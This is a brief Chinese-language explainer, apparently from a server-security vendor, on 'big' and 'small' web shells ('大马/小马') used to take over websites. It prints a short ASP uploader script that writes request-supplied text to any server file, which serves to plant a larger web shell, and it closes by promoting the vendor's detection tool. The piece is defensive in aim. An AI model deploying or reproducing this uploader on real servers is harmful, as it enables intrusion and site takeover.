黑客入侵网站/服务器的方式有很多种,其中一种,就是利用各种手段,将写好的功能强大的脚本放到服务器上,然后找到该脚本的地址运行操作服务器。
其中,就有大马/小马 之说。大马介绍参见:https://www.hws.com/help/tech/418.html
大马就是功能更强大的脚本,可以操作磁盘文件,系统设置,创建用户,批量挂马,删除文件等,这类网页木马容易被木马查杀工具查杀;
相对大马,小马一是功能较弱,二是代码较小,因此被称作小马;
一般地,小马的角色,只是为了将大马传到服务器上,基本代码如下(摘自网络):
dim s
if request('action') = 'set' then
Text = request('Text')
FileName = request('FileName')
set fs = server.CreateObject('Scripting.FileSystemObject')
set file = fs.OpenTextFile(server.MapPath(FileName),8,True)
file.writeline Text
file.close
set file = nothing
set fs = nothing
response.write '保存成功!'
end if
按照原理分析,小马就是接收数据,并且写数据到磁盘中文件的功能,功能简单,与很多正常文件相似,如果简单查杀,容易影响正常文件,因此很难查杀。
小马的存在,给服务器和网站留下了非常大的隐患,因此建议清理之!
值得一提的是,经过算法改进,护卫神目前可以准确识别绝大多数小马,欢迎您的使用。